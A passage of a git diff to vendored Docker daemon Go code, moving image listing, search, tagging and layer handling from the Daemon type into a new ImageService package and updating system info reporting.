*ImageService) SearchRegistryForImages(ctx context.Context, filtersArgs string, term string, limit int, authConfig *types.AuthConfig, headers map[string][]string) (*registrytypes.SearchResults, error) { - searchFilters, err := filters.FromParam(filtersArgs) + searchFilters, err := filters.FromJSON(filtersArgs) if err != nil { return nil, err } @@ -34,26 +35,26 @@ func (daemon *Daemon) SearchRegistryForImages(ctx context.Context, filtersArgs s var isAutomated, isOfficial bool var hasStarFilter = 0 - if searchFilters.Include("is-automated") { + if searchFilters.Contains("is-automated") { if searchFilters.UniqueExactMatch("is-automated", "true") { isAutomated = true } else if !searchFilters.UniqueExactMatch("is-automated", "false") { - return nil, fmt.Errorf("Invalid filter 'is-automated=%s'", searchFilters.Get("is-automated")) + return nil, invalidFilter{"is-automated", searchFilters.Get("is-automated")} } } - if searchFilters.Include("is-official") { + if searchFilters.Contains("is-official") { if searchFilters.UniqueExactMatch("is-official", "true") { isOfficial = true } else if !searchFilters.UniqueExactMatch("is-official", "false") { - return nil, fmt.Errorf("Invalid filter 'is-official=%s'", searchFilters.Get("is-official")) + return nil, invalidFilter{"is-official", searchFilters.Get("is-official")} } } - if searchFilters.Include("stars") { + if searchFilters.Contains("stars") { hasStars := searchFilters.Get("stars") for _, hasStar := range hasStars { iHasStar, err := strconv.Atoi(hasStar) if err != nil { - return nil, fmt.Errorf("Invalid filter 'stars=%s'", hasStar) + return nil, invalidFilter{"stars", hasStar} } if iHasStar > hasStarFilter { hasStarFilter = iHasStar @@ -61,24 +62,24 @@ func (daemon *Daemon) SearchRegistryForImages(ctx context.Context, filtersArgs s } } - unfilteredResult, err := daemon.RegistryService.Search(ctx, term, limit, authConfig, dockerversion.DockerUserAgent(ctx), headers) + unfilteredResult, err := i.registryService.Search(ctx, term, limit, authConfig, dockerversion.DockerUserAgent(ctx), headers) if err != nil { return nil, err } filteredResults := []registrytypes.SearchResult{} for _, result := range unfilteredResult.Results { - if searchFilters.Include("is-automated") { + if searchFilters.Contains("is-automated") { if isAutomated != result.IsAutomated { continue } } - if searchFilters.Include("is-official") { + if searchFilters.Contains("is-official") { if isOfficial != result.IsOfficial { continue } } - if searchFilters.Include("stars") { + if searchFilters.Contains("stars") { if result.StarCount < hasStarFilter { continue } diff --git a/vendor/github.com/docker/docker/daemon/search_test.go b/vendor/github.com/docker/docker/daemon/images/image_search_test.go similarity index 97% rename from vendor/github.com/docker/docker/daemon/search_test.go rename to vendor/github.com/docker/docker/daemon/images/image_search_test.go index f5aa85a61e..4fef86b6f2 100644 --- a/vendor/github.com/docker/docker/daemon/search_test.go +++ b/vendor/github.com/docker/docker/daemon/images/image_search_test.go @@ -1,12 +1,11 @@ -package daemon +package images // import "github.com/docker/docker/daemon/images" import ( - "fmt" + "context" + "errors" "strings" "testing" - "golang.org/x/net/context" - "github.com/docker/docker/api/types" registrytypes "github.com/docker/docker/api/types/registry" "github.com/docker/docker/registry" @@ -23,7 +22,7 @@ type FakeService struct { func (s *FakeService) Search(ctx context.Context, term string, limit int, authConfig *types.AuthConfig, userAgent string, headers map[string][]string) (*registrytypes.SearchResults, error) { if s.shouldReturnError { - return nil, fmt.Errorf("Search unknown error") + return nil, errors.New("Search unknown error") } return ®istrytypes.SearchResults{ Query: s.term, @@ -76,8 +75,8 @@ func TestSearchRegistryForImagesErrors(t *testing.T) { }, } for index, e := range errorCases { - daemon := &Daemon{ - RegistryService: &FakeService{ + daemon := &ImageService{ + registryService: &FakeService{ shouldReturnError: e.shouldReturnError, }, } @@ -322,8 +321,8 @@ func TestSearchRegistryForImages(t *testing.T) { }, } for index, s := range successCases { - daemon := &Daemon{ - RegistryService: &FakeService{ + daemon := &ImageService{ + registryService: &FakeService{ term: term, results: s.registryResults, }, diff --git a/vendor/github.com/docker/docker/daemon/images/image_tag.go b/vendor/github.com/docker/docker/daemon/images/image_tag.go new file mode 100644 index 0000000000..4693611c3a --- /dev/null +++ b/vendor/github.com/docker/docker/daemon/images/image_tag.go @@ -0,0 +1,41 @@ +package images // import "github.com/docker/docker/daemon/images" + +import ( + "github.com/docker/distribution/reference" + "github.com/docker/docker/image" +) + +// TagImage creates the tag specified by newTag, pointing to the image named +// imageName (alternatively, imageName can also be an image ID). +func (i *ImageService) TagImage(imageName, repository, tag string) (string, error) { + img, err := i.GetImage(imageName) + if err != nil { + return "", err + } + + newTag, err := reference.ParseNormalizedNamed(repository) + if err != nil { + return "", err + } + if tag != "" { + if newTag, err = reference.WithTag(reference.TrimNamed(newTag), tag); err != nil { + return "", err + } + } + + err = i.TagImageWithReference(img.ID(), newTag) + return reference.FamiliarString(newTag), err +} + +// TagImageWithReference adds the given reference to the image ID provided. +func (i *ImageService) TagImageWithReference(imageID image.ID, newTag reference.Named) error { + if err := i.referenceStore.AddTag(newTag, imageID.Digest(), true); err != nil { + return err + } + + if err := i.imageStore.SetLastUpdated(imageID); err != nil { + return err + } + i.LogImageEvent(imageID.String(), reference.FamiliarString(newTag), "tag") + return nil +} diff --git a/vendor/github.com/docker/docker/daemon/images/image_unix.go b/vendor/github.com/docker/docker/daemon/images/image_unix.go new file mode 100644 index 0000000000..3f577271a2 --- /dev/null +++ b/vendor/github.com/docker/docker/daemon/images/image_unix.go @@ -0,0 +1,45 @@ +// +build linux freebsd + +package images // import "github.com/docker/docker/daemon/images" + +import ( + "runtime" + + "github.com/sirupsen/logrus" +) + +// GetContainerLayerSize returns the real size & virtual size of the container. +func (i *ImageService) GetContainerLayerSize(containerID string) (int64, int64) { + var ( + sizeRw, sizeRootfs int64 + err error + ) + + // Safe to index by runtime.GOOS as Unix hosts don't support multiple + // container operating systems. + rwlayer, err := i.layerStores[runtime.GOOS].GetRWLayer(containerID) + if err != nil { + logrus.Errorf("Failed to compute size of container rootfs %v: %v", containerID, err) + return sizeRw, sizeRootfs + } + defer i.layerStores[runtime.GOOS].ReleaseRWLayer(rwlayer) + + sizeRw, err = rwlayer.Size() + if err != nil { + logrus.Errorf("Driver %s couldn't return diff size of container %s: %s", + i.layerStores[runtime.GOOS].DriverName(), containerID, err) + // FIXME: GetSize should return an error. Not changing it now in case + // there is a side-effect. + sizeRw = -1 + } + + if parent := rwlayer.Parent(); parent != nil { + sizeRootfs, err = parent.Size() + if err != nil { + sizeRootfs = -1 + } else if sizeRw != -1 { + sizeRootfs += sizeRw + } + } + return sizeRw, sizeRootfs +} diff --git a/vendor/github.com/docker/docker/daemon/images/image_windows.go b/vendor/github.com/docker/docker/daemon/images/image_windows.go new file mode 100644 index 0000000000..6f4be49736 --- /dev/null +++ b/vendor/github.com/docker/docker/daemon/images/image_windows.go @@ -0,0 +1,41 @@ +package images + +import ( + "github.com/docker/docker/image" + "github.com/docker/docker/layer" + "github.com/docker/docker/pkg/system" + "github.com/pkg/errors" +) + +// GetContainerLayerSize returns real size & virtual size +func (i *ImageService) GetContainerLayerSize(containerID string) (int64, int64) { + // TODO Windows + return 0, 0 +} + +// GetLayerFolders returns the layer folders from an image RootFS +func (i *ImageService) GetLayerFolders(img *image.Image, rwLayer layer.RWLayer) ([]string, error) { + folders := []string{} + max := len(img.RootFS.DiffIDs) + for index := 1; index <= max; index++ { + // FIXME: why does this mutate the RootFS? + img.RootFS.DiffIDs = img.RootFS.DiffIDs[:index] + if !system.IsOSSupported(img.OperatingSystem()) { + return nil, errors.Wrapf(system.ErrNotSupportedOperatingSystem, "cannot get layerpath for ImageID %s", img.RootFS.ChainID()) + } + layerPath, err := layer.GetLayerPath(i.layerStores[img.OperatingSystem()], img.RootFS.ChainID()) + if err != nil { + return nil, errors.Wrapf(err, "failed to get layer path from graphdriver %s for ImageID %s", i.layerStores[img.OperatingSystem()], img.RootFS.ChainID()) + } + // Reverse order, expecting parent first + folders = append([]string{layerPath}, folders...) + } + if rwLayer == nil { + return nil, errors.New("RWLayer is unexpectedly nil") + } + m, err := rwLayer.Metadata() + if err != nil { + return nil, errors.Wrap(err, "failed to get layer metadata") + } + return append(folders, m["dir"]), nil +} diff --git a/vendor/github.com/docker/docker/daemon/images.go b/vendor/github.com/docker/docker/daemon/images/images.go similarity index 71% rename from vendor/github.com/docker/docker/daemon/images.go rename to vendor/github.com/docker/docker/daemon/images/images.go index 88fb8f8e91..49212341c5 100644 --- a/vendor/github.com/docker/docker/daemon/images.go +++ b/vendor/github.com/docker/docker/daemon/images/images.go @@ -1,4 +1,4 @@ -package daemon +package images // import "github.com/docker/docker/daemon/images" import ( "encoding/json" @@ -14,6 +14,7 @@ import ( "github.com/docker/docker/container" "github.com/docker/docker/image" "github.com/docker/docker/layer" + "github.com/docker/docker/pkg/system" ) var acceptedImageFilterTags = map[string]bool{ @@ -33,8 +34,8 @@ func (r byCreated) Swap(i, j int) { r[i], r[j] = r[j], r[i] } func (r byCreated) Less(i, j int) bool { return r[i].Created < r[j].Created } // Map returns a map of all images in the ImageStore -func (daemon *Daemon) Map() map[image.ID]*image.Image { - return daemon.imageStore.Map() +func (i *ImageService) Map() map[image.ID]*image.Image { + return i.imageStore.Map() } // Images returns a filtered list of images. filterArgs is a JSON-encoded set @@ -42,7 +43,7 @@ func (daemon *Daemon) Map() map[image.ID]*image.Image { // filter is a shell glob string applied to repository names. The argument // named all controls whether all images in the graph are filtered, or just // the heads. -func (daemon *Daemon) Images(imageFilters filters.Args, all bool, withExtraAttrs bool) ([]*types.ImageSummary, error) { +func (i *ImageService) Images(imageFilters filters.Args, all bool, withExtraAttrs bool) ([]*types.ImageSummary, error) { var ( allImages map[image.ID]*image.Image err error @@ -53,22 +54,22 @@ func (daemon *Daemon) Images(imageFilters filters.Args, all bool, withExtraAttrs return nil, err } - if imageFilters.Include("dangling") { + if imageFilters.Contains("dangling") { if imageFilters.ExactMatch("dangling", "true") { danglingOnly = true } else if !imageFilters.ExactMatch("dangling", "false") { - return nil, fmt.Errorf("Invalid filter 'dangling=%s'", imageFilters.Get("dangling")) + return nil, invalidFilter{"dangling", imageFilters.Get("dangling")} } } if danglingOnly { - allImages = daemon.imageStore.Heads() + allImages = i.imageStore.Heads() } else { - allImages = daemon.imageStore.Map() + allImages = i.imageStore.Map() } var beforeFilter, sinceFilter *image.Image err = imageFilters.WalkValues("before", func(value string) error { - beforeFilter, err = daemon.GetImage(value) + beforeFilter, err = i.GetImage(value) return err }) if err != nil { @@ -76,7 +77,7 @@ func (daemon *Daemon) Images(imageFilters filters.Args, all bool, withExtraAttrs } err = imageFilters.WalkValues("since", func(value string) error { - sinceFilter, err = daemon.GetImage(value) + sinceFilter, err = i.GetImage(value) return err }) if err != nil { @@ -102,7 +103,7 @@ func (daemon *Daemon) Images(imageFilters filters.Args, all bool, withExtraAttrs } } - if imageFilters.Include("label") { + if imageFilters.Contains("label") { // Very old image that do not have image.Config (or even labels) if img.Config == nil { continue @@ -113,16 +114,28 @@ func (daemon *Daemon) Images(imageFilters filters.Args, all bool, withExtraAttrs } } + // Skip any images with an unsupported operating system to avoid a potential + // panic when indexing through the layerstore. Don't error as we want to list + // the other images. This should never happen, but here as a safety precaution. + if !system.IsOSSupported(img.OperatingSystem()) { + continue + } + layerID := img.RootFS.ChainID() var size int64 if layerID != "" { - l, err := daemon.layerStore.Get(layerID) + l, err := i.layerStores[img.OperatingSystem()].Get(layerID) if err != nil { + // The layer may have been deleted between the call to `Map()` or + // `Heads()` and the call to `Get()`, so we just ignore this error + if err == layer.ErrLayerDoesNotExist { + continue + } return nil, err } size, err = l.Size() - layer.ReleaseAndLog(daemon.layerStore, l) + layer.ReleaseAndLog(i.layerStores[img.OperatingSystem()], l) if err != nil { return nil, err } @@ -130,12 +143,12 @@ func (daemon *Daemon) Images(imageFilters filters.Args, all bool, withExtraAttrs newImage := newImage(img, size) - for _, ref := range daemon.referenceStore.References(id.Digest()) { - if imageFilters.Include("reference") { + for _, ref := range i.referenceStore.References(id.Digest()) { + if imageFilters.Contains("reference") { var found bool var matchErr error for _, pattern := range imageFilters.Get("reference") { - found, matchErr = reference.Match(pattern, ref) + found, matchErr = reference.FamiliarMatch(pattern, ref) if matchErr != nil { return nil, matchErr } @@ -145,20 +158,20 @@ func (daemon *Daemon) Images(imageFilters filters.Args, all bool, withExtraAttrs } } if _, ok := ref.(reference.Canonical); ok { - newImage.RepoDigests = append(newImage.RepoDigests, ref.String()) + newImage.RepoDigests = append(newImage.RepoDigests, reference.FamiliarString(ref)) } if _, ok := ref.(reference.NamedTagged); ok { - newImage.RepoTags = append(newImage.RepoTags, ref.String()) + newImage.RepoTags = append(newImage.RepoTags, reference.FamiliarString(ref)) } } if newImage.RepoDigests == nil && newImage.RepoTags == nil { - if all || len(daemon.imageStore.Children(id)) == 0 { + if all || len(i.imageStore.Children(id)) == 0 { - if imageFilters.Include("dangling") && !danglingOnly { + if imageFilters.Contains("dangling") && !danglingOnly { //dangling=false case, so dangling image is not needed continue } - if imageFilters.Include("reference") { // skip images with no references if filtering by reference + if imageFilters.Contains("reference") { // skip images with no references if filtering by reference continue } newImage.RepoDigests = []string{"@"} @@ -171,10 +184,10 @@ func (daemon *Daemon) Images(imageFilters filters.Args, all bool, withExtraAttrs } if withExtraAttrs { - // lazyly init variables + // lazily init variables if imagesMap == nil { - allContainers = daemon.List() - allLayers = daemon.layerStore.Map() + allContainers = i.containers.List() + allLayers = i.layerStores[img.OperatingSystem()].Map() imagesMap = make(map[*image.Image]*types.ImageSummary) layerRefs = make(map[layer.ChainID]int) } @@ -236,16 +249,20 @@ func (daemon *Daemon) Images(imageFilters filters.Args, all bool, withExtraAttrs // This new image contains only the layers from it's parent + 1 extra layer which contains the diff of all the layers in between. // The existing image(s) is not destroyed. // If no parent is specified, a new image with the diff of all the specified image's layers merged into a new layer that has no parents. -func (daemon *Daemon) SquashImage(id, parent string) (string, error) { - img, err := daemon.imageStore.Get(image.ID(id)) - if err != nil { +func (i *ImageService) SquashImage(id, parent string) (string, error) { + + var ( + img *image.Image + err error + ) + if img, err = i.imageStore.Get(image.ID(id)); err != nil { return "", err } var parentImg *image.Image var parentChainID layer.ChainID if len(parent) != 0 { - parentImg, err = daemon.imageStore.Get(image.ID(parent)) + parentImg, err = i.imageStore.Get(image.ID(parent)) if err != nil { return "", errors.Wrap(err, "error getting specified parent layer") } @@ -254,12 +271,14 @@ func (daemon *Daemon) SquashImage(id, parent string) (string, error) { rootFS := image.NewRootFS() parentImg = &image.Image{RootFS: rootFS} } - - l, err := daemon.layerStore.Get(img.RootFS.ChainID()) + if !system.IsOSSupported(img.OperatingSystem()) { + return "", errors.Wrap(err, system.ErrNotSupportedOperatingSystem.Error()) + } + l, err := i.layerStores[img.OperatingSystem()].Get(img.RootFS.ChainID()) if err != nil { return "", errors.Wrap(err, "error getting image layer") } - defer daemon.layerStore.Release(l) + defer i.layerStores[img.OperatingSystem()].Release(l) ts, err := l.TarStreamFrom(parentChainID) if err != nil { @@ -267,18 +286,16 @@ func (daemon *Daemon) SquashImage(id, parent string) (string, error) { } defer ts.Close() - newL, err := daemon.layerStore.Register(ts, parentChainID) + newL, err := i.layerStores[img.OperatingSystem()].Register(ts, parentChainID) if err != nil { return "", errors.Wrap(err, "error registering layer") } - defer daemon.layerStore.Release(newL) + defer i.layerStores[img.OperatingSystem()].Release(newL) - var newImage image.Image - newImage = *img + newImage := *img newImage.RootFS = nil - var rootFS image.RootFS - rootFS = *parentImg.RootFS + rootFS := *parentImg.RootFS rootFS.DiffIDs = append(rootFS.DiffIDs, newL.DiffID()) newImage.RootFS = &rootFS @@ -308,20 +325,20 @@ func (daemon *Daemon) SquashImage(id, parent string) (string, error) { return "", errors.Wrap(err, "error marshalling image config") } - newImgID, err := daemon.imageStore.Create(b) + newImgID, err := i.imageStore.Create(b) if err != nil { return "", errors.Wrap(err, "error creating new image after squash") } return string(newImgID), nil } -func newImage(image *image.Image, virtualSize int64) *types.ImageSummary { +func newImage(image *image.Image, size int64) *types.ImageSummary { newImage := new(types.ImageSummary) newImage.ParentID = image.Parent.String() newImage.ID = image.ID().String() newImage.Created = image.Created.Unix() - newImage.Size = virtualSize - newImage.VirtualSize = virtualSize + newImage.Size = size + newImage.VirtualSize = size newImage.SharedSize = -1 newImage.Containers = -1 if image.Config != nil { diff --git a/vendor/github.com/docker/docker/daemon/images/locals.go b/vendor/github.com/docker/docker/daemon/images/locals.go new file mode 100644 index 0000000000..5ffc460a09 --- /dev/null +++ b/vendor/github.com/docker/docker/daemon/images/locals.go @@ -0,0 +1,32 @@ +package images // import "github.com/docker/docker/daemon/images" + +import ( + "fmt" + + "github.com/docker/go-metrics" +) + +type invalidFilter struct { + filter string + value interface{} +} + +func (e invalidFilter) Error() string { + msg := "Invalid filter '" + e.filter + if e.value != nil { + msg += fmt.Sprintf("=%s", e.value) + } + return msg + "'" +} + +func (e invalidFilter) InvalidParameter() {} + +var imageActions metrics.LabeledTimer + +func init() { + ns := metrics.NewNamespace("engine", "daemon", nil) + imageActions = ns.NewLabeledTimer("image_actions", "The number of seconds it takes to process each image action", "action") + // TODO: is it OK to register a namespace with the same name? Or does this + // need to be exported from somewhere? + metrics.Register(ns) +} diff --git a/vendor/github.com/docker/docker/daemon/images/service.go b/vendor/github.com/docker/docker/daemon/images/service.go new file mode 100644 index 0000000000..263217dccd --- /dev/null +++ b/vendor/github.com/docker/docker/daemon/images/service.go @@ -0,0 +1,251 @@ +package images // import "github.com/docker/docker/daemon/images" + +import ( + "context" + "os" + "runtime" + + "github.com/docker/docker/container" + daemonevents "github.com/docker/docker/daemon/events" + "github.com/docker/docker/distribution" + "github.com/docker/docker/distribution/metadata" + "github.com/docker/docker/distribution/xfer" + "github.com/docker/docker/image" + "github.com/docker/docker/layer" + dockerreference "github.com/docker/docker/reference" + "github.com/docker/docker/registry" + "github.com/docker/libtrust" + "github.com/opencontainers/go-digest" + "github.com/pkg/errors" + "github.com/sirupsen/logrus" +) + +type containerStore interface { + // used by image delete + First(container.StoreFilter) *container.Container + // used by image prune, and image list + List() []*container.Container + // TODO: remove, only used for CommitBuildStep + Get(string) *container.Container +} + +// ImageServiceConfig is the configuration used to create a new ImageService +type ImageServiceConfig struct { + ContainerStore containerStore + DistributionMetadataStore metadata.Store + EventsService *daemonevents.Events + ImageStore image.Store + LayerStores map[string]layer.Store + MaxConcurrentDownloads int + MaxConcurrentUploads int + ReferenceStore dockerreference.Store + RegistryService registry.Service + TrustKey libtrust.PrivateKey +} + +// NewImageService returns a new ImageService from a configuration +func NewImageService(config ImageServiceConfig) *ImageService { + logrus.Debugf("Max Concurrent Downloads: %d", config.MaxConcurrentDownloads) + logrus.Debugf("Max Concurrent Uploads: %d", config.MaxConcurrentUploads) + return &ImageService{ + containers: config.ContainerStore, + distributionMetadataStore: config.DistributionMetadataStore, + downloadManager: xfer.NewLayerDownloadManager(config.LayerStores, config.MaxConcurrentDownloads), + eventsService: config.EventsService, + imageStore: config.ImageStore, + layerStores: config.LayerStores, + referenceStore: config.ReferenceStore, + registryService: config.RegistryService, + trustKey: config.TrustKey, + uploadManager: xfer.NewLayerUploadManager(config.MaxConcurrentUploads), + } +} + +// ImageService provides a backend for image management +type ImageService struct { + containers containerStore + distributionMetadataStore metadata.Store + downloadManager *xfer.LayerDownloadManager + eventsService *daemonevents.Events + imageStore image.Store + layerStores map[string]layer.Store // By operating system + pruneRunning int32 + referenceStore dockerreference.Store + registryService registry.Service + trustKey libtrust.PrivateKey + uploadManager *xfer.LayerUploadManager +} + +// DistributionServices provides daemon image storage services +type DistributionServices struct { + DownloadManager distribution.RootFSDownloadManager + V2MetadataService metadata.V2MetadataService + LayerStore layer.Store // TODO: lcow + ImageStore image.Store + ReferenceStore dockerreference.Store +} + +// DistributionServices return services controlling daemon image storage +func (i *ImageService) DistributionServices() DistributionServices { + return DistributionServices{ + DownloadManager: i.downloadManager, + V2MetadataService: metadata.NewV2MetadataService(i.distributionMetadataStore), + LayerStore: i.layerStores[runtime.GOOS], + ImageStore: i.imageStore, + ReferenceStore: i.referenceStore, + } +} + +// CountImages returns the number of images stored by ImageService +// called from info.go +func (i *ImageService) CountImages() int { + return i.imageStore.Len() +} + +// Children returns the children image.IDs for a parent image. +// called from list.go to filter containers +// TODO: refactor to expose an ancestry for image.ID? +func (i *ImageService) Children(id image.ID) []image.ID { + return i.imageStore.Children(id) +} + +// CreateLayer creates a filesystem layer for a container. +// called from create.go +// TODO: accept an opt struct instead of container? +func (i *ImageService) CreateLayer(container *container.Container, initFunc layer.MountInit) (layer.RWLayer, error) { + var layerID layer.ChainID + if container.ImageID != "" { + img, err := i.imageStore.Get(container.ImageID) + if err != nil { + return nil, err + } + layerID = img.RootFS.ChainID() + } + + rwLayerOpts := &layer.CreateRWLayerOpts{ + MountLabel: container.MountLabel, + InitFunc: initFunc, + StorageOpt: container.HostConfig.StorageOpt, + } + + // Indexing by OS is safe here as validation of OS has already been performed in create() (the only + // caller), and guaranteed non-nil + return i.layerStores[container.OS].CreateRWLayer(container.ID, layerID, rwLayerOpts) +} + +// GetLayerByID returns a layer by ID and operating system +// called from daemon.go Daemon.restore(), and Daemon.containerExport() +func (i *ImageService) GetLayerByID(cid string, os string) (layer.RWLayer, error) { + return i.layerStores[os].GetRWLayer(cid) +} + +// LayerStoreStatus returns the status for each layer store +// called from info.go +func (i *ImageService) LayerStoreStatus() map[string][][2]string { + result := make(map[string][][2]string) + for os, store := range i.layerStores { + result[os] = store.DriverStatus() + } + return result +} + +// GetLayerMountID returns the mount ID for a layer +// called from daemon.go Daemon.Shutdown(), and Daemon.Cleanup() (cleanup is actually continerCleanup) +// TODO: needs to be refactored to Unmount (see callers), or removed and replaced +// with GetLayerByID +func (i *ImageService) GetLayerMountID(cid string, os string) (string, error) { + return i.layerStores[os].GetMountID(cid) +} + +// Cleanup resources before the process is shutdown. +// called from daemon.go Daemon.Shutdown() +func (i *ImageService) Cleanup() { + for os, ls := range i.layerStores { + if ls != nil { + if err := ls.Cleanup(); err != nil { + logrus.Errorf("Error during layer Store.Cleanup(): %v %s", err, os) + } + } + } +} + +// GraphDriverForOS returns the name of the graph drvier +// moved from Daemon.GraphDriverName, used by: +// - newContainer +// - to report an error in Daemon.Mount(container) +func (i *ImageService) GraphDriverForOS(os string) string { + return i.layerStores[os].DriverName() +} + +// ReleaseLayer releases a layer allowing it to be removed +// called from delete.go Daemon.cleanupContainer(), and Daemon.containerExport() +func (i *ImageService) ReleaseLayer(rwlayer layer.RWLayer, containerOS string) error { + metadata, err := i.layerStores[containerOS].ReleaseRWLayer(rwlayer) + layer.LogReleaseMetadata(metadata) + if err != nil && err != layer.ErrMountDoesNotExist && !os.IsNotExist(errors.Cause(err)) { + return errors.Wrapf(err, "driver %q failed to remove root filesystem", + i.layerStores[containerOS].DriverName()) + } + return nil +} + +// LayerDiskUsage returns the number of bytes used by layer stores +// called from disk_usage.go +func (i *ImageService) LayerDiskUsage(ctx context.Context) (int64, error) { + var allLayersSize int64 + layerRefs := i.getLayerRefs() + for _, ls := range i.layerStores { + allLayers := ls.Map() + for _, l := range allLayers { + select { + case <-ctx.Done(): + return allLayersSize, ctx.Err() + default: + size, err := l.DiffSize() + if err == nil { + if _, ok := layerRefs[l.ChainID()]; ok { + allLayersSize += size + } else { + logrus.Warnf("found leaked image layer %v", l.ChainID()) + } + } else { + logrus.Warnf("failed to get diff size for layer %v", l.ChainID()) + } + } + } + } + return allLayersSize, nil +} + +func (i *ImageService) getLayerRefs() map[layer.ChainID]int { + tmpImages := i.imageStore.Map() + layerRefs := map[layer.ChainID]int{} + for id, img := range tmpImages { + dgst := digest.Digest(id) + if len(i.referenceStore.References(dgst)) == 0 && len(i.imageStore.Children(id)) != 0 { + continue + } + + rootFS := *img.RootFS + rootFS.DiffIDs = nil + for _, id := range img.RootFS.DiffIDs { + rootFS.Append(id) + chid := rootFS.ChainID() + layerRefs[chid]++ + } + } + + return layerRefs +} + +// UpdateConfig values +// +// called from reload.go +func (i *ImageService) UpdateConfig(maxDownloads, maxUploads *int) { + if i.downloadManager != nil && maxDownloads != nil { + i.downloadManager.SetConcurrency(*maxDownloads) + } + if i.uploadManager != nil && maxUploads != nil { + i.uploadManager.SetConcurrency(*maxUploads) + } +} diff --git a/vendor/github.com/docker/docker/daemon/info.go b/vendor/github.com/docker/docker/daemon/info.go index 1ab9f29592..7b011fe324 100644 --- a/vendor/github.com/docker/docker/daemon/info.go +++ b/vendor/github.com/docker/docker/daemon/info.go @@ -1,16 +1,16 @@ -package daemon +package daemon // import "github.com/docker/docker/daemon" import ( "fmt" "os" "runtime" - "sync/atomic" + "strings" "time" - "github.com/Sirupsen/logrus" "github.com/docker/docker/api" "github.com/docker/docker/api/types" - "github.com/docker/docker/container" + "github.com/docker/docker/cli/debug" + "github.com/docker/docker/daemon/logger" "github.com/docker/docker/dockerversion" "github.com/docker/docker/pkg/fileutils" "github.com/docker/docker/pkg/parsers/kernel" @@ -19,9 +19,8 @@ import ( "github.com/docker/docker/pkg/sysinfo" "github.com/docker/docker/pkg/system" "github.com/docker/docker/registry" - "github.com/docker/docker/utils" - "github.com/docker/docker/volume/drivers" "github.com/docker/go-connections/sockets" + "github.com/sirupsen/logrus" ) // SystemInfo returns information about the host server the daemon is running on. @@ -57,18 +56,7 @@ func (daemon *Daemon) SystemInfo() (*types.Info, error) { } sysInfo := sysinfo.New(true) - - var cRunning, cPaused, cStopped int32 - daemon.containers.ApplyAll(func(c *container.Container) { - switch c.StateString() { - case "paused": - atomic.AddInt32(&cPaused, 1) - case "running": - atomic.AddInt32(&cRunning, 1) - default: - atomic.AddInt32(&cStopped, 1) - } - }) + cRunning, cPaused, cStopped := stateCtr.get() securityOptions := []string{} if sysInfo.AppArmor { @@ -84,25 +72,37 @@ func (daemon *Daemon) SystemInfo() (*types.Info, error) { if selinuxEnabled() { securityOptions = append(securityOptions, "name=selinux") } - uid, gid := daemon.GetRemappedUIDGID() - if uid != 0 || gid != 0 { + rootIDs := daemon.idMappings.RootPair() + if rootIDs.UID != 0 || rootIDs.GID != 0 { securityOptions = append(securityOptions, "name=userns") } + var ds [][2]string + drivers := "" + statuses := daemon.imageService.LayerStoreStatus() + for os, gd := range daemon.graphDrivers { + ds = append(ds, statuses[os]...) + drivers += gd + if len(daemon.graphDrivers) > 1 { + drivers += fmt.Sprintf(" (%s) ", os) + } + } + drivers = strings.TrimSpace(drivers) + v := &types.Info{ ID: daemon.ID, - Containers: int(cRunning + cPaused + cStopped), - ContainersRunning: int(cRunning), - ContainersPaused: int(cPaused), - ContainersStopped: int(cStopped), - Images: len(daemon.imageStore.Map()), - Driver: daemon.GraphDriverName(), - DriverStatus: daemon.layerStore.DriverStatus(), + Containers: cRunning + cPaused + cStopped, + ContainersRunning: cRunning, + ContainersPaused: cPaused, + ContainersStopped: cStopped, + Images: daemon.imageService.CountImages(), + Driver: drivers, + DriverStatus: ds, Plugins: daemon.showPluginsInfo(), IPv4Forwarding: !sysInfo.IPv4ForwardingDisabled, BridgeNfIptables: !sysInfo.BridgeNFCallIPTablesDisabled, BridgeNfIP6tables: !sysInfo.BridgeNFCallIP6TablesDisabled, - Debug: utils.IsDebugEnabled(), + Debug: debug.IsEnabled(), NFd: fileutils.GetTotalUsedFds(), NGoroutines: runtime.NumGoroutine(), SystemTime: time.Now().Format(time.RFC3339Nano), @@ -117,6 +117,7 @@ func (daemon *Daemon) SystemInfo() (*types.Info, error) { RegistryConfig: daemon.RegistryService.ServiceConfig(), NCPU: sysinfo.NumCPU(), MemTotal: meminfo.MemTotal, + GenericResources: daemon.genericResources, DockerRootDir: daemon.configStore.Root, Labels: daemon.configStore.Labels, ExperimentalBuild: daemon.configStore.Experimental, @@ -147,24 +148,46 @@ func (daemon *Daemon) SystemInfo() (*types.Info, error) { // SystemVersion returns version information about the daemon. func (daemon *Daemon) SystemVersion() types.Version { + kernelVersion := "" + if kv, err := kernel.GetKernelVersion(); err != nil { + logrus.Warnf("Could not get kernel version: %v", err) + } else { + kernelVersion = kv.String() + } + v := types.Version{ + Components: []types.ComponentVersion{ + { + Name: "Engine", + Version: dockerversion.Version, + Details: map[string]string{ + "GitCommit": dockerversion.GitCommit, + "ApiVersion": api.DefaultVersion, + "MinAPIVersion": api.MinVersion, + "GoVersion": runtime.Version(), + "Os": runtime.GOOS, + "Arch": runtime.GOARCH, + "BuildTime": dockerversion.BuildTime, + "KernelVersion": kernelVersion, + "Experimental": fmt.Sprintf("%t", daemon.configStore.Experimental), + }, + }, + }, + + // Populate deprecated fields for older clients Version: dockerversion.Version, GitCommit: dockerversion.GitCommit, + APIVersion: api.DefaultVersion, MinAPIVersion: api.MinVersion, GoVersion: runtime.Version(), Os: runtime.GOOS, Arch: runtime.GOARCH, BuildTime: dockerversion.BuildTime, + KernelVersion: kernelVersion, Experimental: daemon.configStore.Experimental, } - kernelVersion := "" - if kv, err := kernel.GetKernelVersion(); err != nil { - logrus.Warnf("Could not get kernel version: %v", err) - } else { - kernelVersion = kv.String() - } - v.KernelVersion = kernelVersion + v.Platform.Name = dockerversion.PlatformName return v } @@ -172,9 +195,12 @@ func (daemon *Daemon) SystemVersion() types.Version { func (daemon *Daemon) showPluginsInfo() types.PluginsInfo { var pluginsInfo types.PluginsInfo - pluginsInfo.Volume = volumedrivers.GetDriverList() + pluginsInfo.Volume = daemon.volumes.GetDriverList() pluginsInfo.Network = daemon.GetNetworkDriverList() + // The authorization plugins are returned in the order they are + // used as they constitute a request/response modification chain. pluginsInfo.Authorization = daemon.configStore.AuthorizationPlugins + pluginsInfo.Log = logger.ListDrivers() return pluginsInfo } diff --git a/vendor/github.com/docker/docker/daemon/info_unix.go b/vendor/github.com/docker/docker/daemon/info_unix.go index 9c41c0e4cd..56be9c06fb 100644 --- a/vendor/github.com/docker/docker/daemon/info_unix.go +++ b/vendor/github.com/docker/docker/daemon/info_unix.go @@ -1,16 +1,17 @@ // +build !windows -package daemon +package 